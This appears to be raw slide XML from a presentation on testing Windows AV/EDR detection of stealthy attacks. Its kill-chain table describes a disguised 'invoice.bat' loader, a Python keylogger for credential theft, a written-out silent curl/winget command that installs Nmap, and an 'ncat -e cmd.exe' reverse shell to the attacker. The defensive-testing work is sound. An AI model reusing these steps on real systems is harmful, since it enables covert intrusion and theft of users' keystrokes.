              <a:t> (n.d.). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49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https://nmap.org/ncat/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200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78BF4-098E-AFA4-5672-912879CA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0C8D267-73E0-44AD-BB73-DC912E23DE7F}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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AE3A4-6871-1DCD-AF3E-861D19E2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8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ADC5-5DC7-E60B-1C6F-EF3BA5BD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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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5713-37B0-CE7A-119C-638D06BD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9BAB135-AC55-46A9-B382-A0CD0F5E69CE}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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ED6E3-7A10-CB25-8DF9-26558469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3B1EDEE-19C9-BDD3-C9E4-2AF450116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553789"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914399" y="2559171"/>
          <a:ext cx="10363200" cy="338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64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56B6-4382-19AD-8CE1-190D8135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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>So, why test security solutions against stealthy attack techniques in Windows?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2800" b="1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85DD-2A00-2690-E8EF-4043EA361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Modern attackers rarely rely on obvious malware. Instead, they use stealth techniques. Keyloggers, process injection, hidden commands, and backdoors operate silently, bypassing traditional AV/EDR detection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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Security tools like Windows Defender often miss in-memory execution or obfuscated persistence techniques. Signatures alone aren't enough.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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That’s why we simulate real-world evasion techniques and log system behaviour, network activity, and event data to evaluate how well security solutions detect and respond to advanced threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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E9270-34BE-25E0-CCC0-A7C23C0D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351E-C270-46DD-80ED-AFDD220DC890}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:t>12/05/2025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DB701-4BBF-D53F-A4F9-E8B31B39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9DA5-F402-3763-0D82-4347B54B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</p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Methodology: How We Test Detection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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DA5D4-7AD4-6BA8-C9A6-C5D2EDDF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6CB078-DF6F-41F6-937D-A444BCFD5358}" type="datetime1">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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D8C0A-8357-E67E-BFD4-4ABAE6D8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F7925571-FC87-7228-B212-3C77A0A148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886333"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1025117" y="2298658"/>
          <a:ext cx="9549098" cy="3643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215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306BB-85C5-E2FD-0A3B-4EC624F3D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7C2A-3308-A6E8-3250-0FDA67B8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accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Methodology: What We Monitor?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt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36B12AE-4BF8-327C-3FAF-70C952AE0D40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="912628" y="2934586"/>
            <a:ext cx="3859397" cy="29344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buSzPct val="87000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>These data sources helped identify stages the AV/EDR missed.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EB539-FD4C-ACD0-73B5-5579A573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6CB078-DF6F-41F6-937D-A444BCFD5358}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>5/12/2025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7700E-2360-CD5A-2043-CE172A97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7832BFB0-53B9-471A-6AD2-98BF08EA3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243221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94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8845-F801-78D0-9B32-62046DAD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627468"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Five-Stage Kill Chain – End-to-End Breach Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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EA5AF-1B37-7806-D0B3-3C097448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22A4-D096-4370-8F41-57CDC84BF3A0}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:t>12/05/2025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DAD5F-4357-1AFA-DD48-9281003C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7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B2EC72-BD5A-E07B-8CF8-044D3A76D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58279"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1002974" y="1999435"/>
          <a:ext cx="10630442" cy="4252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561">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="621628939"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7359487">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3074278565"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1446394">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1555075080"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="240554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</a:rPr>
                        <a:t>Kill-Chain in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</a:rPr>
                        <a:t>Concrete example in our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</a:rPr>
                        <a:t>Relevant File(s)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37252"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="577331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Weaponization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Adversary prepares a malicious batch loader that drops a Python keylogger and LOLBAS tools (curl, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1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winget</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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cmd_commands.bat</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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54479"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7096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Delivery / Initial Access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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Attacker  is hiding  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="1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invoice.bat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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 and sending to the user (or placed on a USB stick). A double-click triggers execution.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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baseline="0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invoice.bat (copy of cmd_commands.bat)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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GB" sz="110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16362"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7336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Execution (Exploitation)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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Batch file spawns hidden command prompt (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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Consolas"/>
                        </a:rPr>
                        <a:t>start /min</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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) to download Nmap-bundle (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="1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ncat.exe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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) and the compile keylogger.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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baseline="0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cmd_commands.bat lines with curl &amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" err="1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winget</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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95986"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9862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Installation + Persistence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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curl -o AppInstaller.msixbundle https://aka.ms/getwinget  &amp;  winget --version &amp; winget install Insecure.Nmap --accept-package-agreements --accept-source-agreements --silent &amp;  attrib +h "AppInstaller.msixbundle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baseline="0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cmd_commands.bat, keylog.py</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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540412"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9862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C2 &amp; Actions on Objectives</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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Batch launches an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1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ncat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="1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 -e cmd.exe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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 reverse shell back to the attacker (C2).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="110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Meanwhile </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="1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keylog.py</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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 records keystrokes to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="11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Consolas"/>
                        </a:rPr>
                        <a:t>logs\\key.txt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1100" b="0" i="0" u="none" strike="noStrike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 for credential theft (Collection).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="110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baseline="0" noProof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cmd_commands.bat, keylog.py</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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88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59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57B9-C216-B46A-B005-A40E1DB1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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hidden Command in a File – Experimental Steps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131FD-2934-F68B-3AB8-7AC97F38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E569EC5-67C7-419B-99B9-66630AE43F25}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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FFADF-275D-FC7D-B452-A8184732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9DAE946-E386-565C-FC07-1E54415D9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031380"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914399" y="2559171"/>
          <a:ext cx="10363200" cy="338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872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7D04-DBAA-0751-F26D-26445EA6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832123" cy="11875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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="49000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Keylogger Deployment &amp; Execution – Experimental Steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="320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0CDE6-3BFF-1AB9-6E2E-B36F96B0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C88D16-E402-4C6D-9803-283C692BFBCD}" type="datetime1">
              <a:rPr lang="fr-FR"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12/05/2025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3C9B0-F8E5-A337-3E12-257A3557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299" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE73D4C-3793-58EC-DF9C-6A05C0B18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102056"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="917004" y="2151468"/>
          <a:ext cx="10363200" cy="338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23" name="Graphic 422" descr="Rocket with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E78B5A-8AEA-58B4-1708-6E5D5309CD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0349" y="25621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8638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B94AB8F-A8F8-4644-80C6-5B0F83E0C825}">
  <we:reference id="4b785c87-866c-4bad-85d8-5d1ae467ac9a" version="3.14.4.0" store="excatalog" storeType="excatalog"/>
  <we:alternateReferences>
    <we:reference id="WA104381909" version="3.14.4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sub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;m&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;T subscript m space equals space K. I\&quot;,\&quot;imageHeight\&quot;:11.675675675675675},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;f&lt;/mi&gt;&lt;/msub&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;iVBORw0KGgoAAAANSUhEUgAAAHQAAAB7CAYAAAClzKTyAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAABGJhU0UAAABBwf/jmAAABaxJREFUeNrtnVFkHVkYxz9VERVhVVVVlBVVUbHEiuhDhbiqIiqsFdGHKhVVq6pU1aqIJaIPFVWiImJViKioqrIqog9VqqJqxRJrH9ZaISqqIkp3jkz13tnv3HxJZu6d/5z/j/NyjTNz//8558yc+c53RGzsj8qnqHwuWGmVQDlXQDNXJGAmCmjoRMiG/mEQyHXJi1GZjsqVqPRH5UxUTkalKSoNUdmXqHfKKP7VKte2L67/bHzcC2Od50I18/g2wsxFpS8eZ3fKP0bx23ZYrzv+5TY3X2Oohg55RHkWm71bThjN/GsP55j21LkYcnf7SBHkegr1XjEaOrXH82hd8M+hmunGp82EGBczvFG00r/H83QodXaFamhPQoixFG+UDeODVnMK51suq/NDyN3taJkQSynW221snWmNdeVj6UzIhr7Zw5NmNYaNhqY11t3LYMiA43CZCPdTrtv6rtiZwQ10NFRDB2IBNlMWoUls88LrKZ7zSwtdDrm7nYlFuJtyvf3G1pnmWDcZ1zkesqGrcUs6lnK9D4yGDmZwc/aGbKibgy1lUO+K0dAjKZ5zJCprsrvpSVKFVqOZS5QKg4tGQ8coFQazRkNLlCr/uOm+DwYzN+X/301JDuk0ts7HlAqDW0ZDL1MqDBaMhp6gVPnHGgb6J6XCwBoGOkmpMBgXRuIVit/FFp3QSKnyzxGpbXQCyZjzUtvoBJIxM1Lb6ASSMasGM9coEwbfSe2jE0iGXDMaOkCpMHhmNPQgpco/brpvUxidUBjOGFvnKKXC4I7R0B5KhcEbg5kfhdEJEBw0ts5HlAqDH42GDlEqDKaNhh6nVBhYkmGsUCYMrMkw7lMqDKzJMBidAMK82KITGihV/tGypmhlgVJhYE2GcYNSYTBiNLSDUmHw0mDmKmXCwJoMY5pSYWBNhsHoBBCsyTAYnQCCJRnGK8qEgTUZxjClwuCS0dAuSoXBnNiiEwgA1mQYzJ2wtXDLzZI9la1chhvxjf4i/r05DxfZZ+xuHwT+ju6C5rab5/43KqfrfbG/GQ29F6iZ30rlNinubeCCfP3a1K0MTW31utgesW98E+IH7fa41ZWvgW1KHKNto1KX4LkWse+78mV/l5BoSZjpWuk3ynGTeXiA7EtcrKW4ed5QvrK47nQp8f99Y+NjRav3tbhI16+7pFCvZff7jbmn4dH4zxU51endxP9+UuVYLSHXnazGx9nYwA3JZkM59+juIuxd2MrDeMxBR1sT+32V4xulcg+bOckoechlqf2OgWcLYGjym/DbHTwNH+Krer7QVtxdoyy4LCqGHqUsmJxUzHxNWYrzZOvKCGXBxH2g0NL3cDEzKL3CVOuFQls+ydUBwN3tutRotodkT0my2ZmY1IkJj6GtlCa/XaolxGan5QClrQ+dGZj5jrLiTCa4coHSYOKLp2qnNJhjq/admPHHoLR7WucTSoPJoMfQ25QGkymPob2UBhMtWI6bCYHi25yP75egnPZ0t1OUBhNf+jvmjwDloTBdbKHQ8kmsUxZMDggXYxWKXo+hNykNJrc8hpYoDSZzngmF/ZQGkzVhQq3C4Nt+eoLSYOJLUPkDpcFkzGNoC6XB5KnouYUIKFrIySxlwaTN093+RGkwGfAYeorSYKIliOKSQWBeKYY+pyyYuFaohZwwQzcoXZ7xs5vSYKKlYOf+4cBoISczlAWXZcXQQcqCSYPndaWJ0mCihZzMUxZchoXbTReKZELGv/l0i4u2hSaXCwIzoLx7cnfFHOJyCFl2MZpPGDpK6fKFa10LUhnt7gu/PJTobtfYOvOHlvXLl0L8duK4IcqXP7SMYL8qxzVLZfwtM2sCGXpVOa58+2m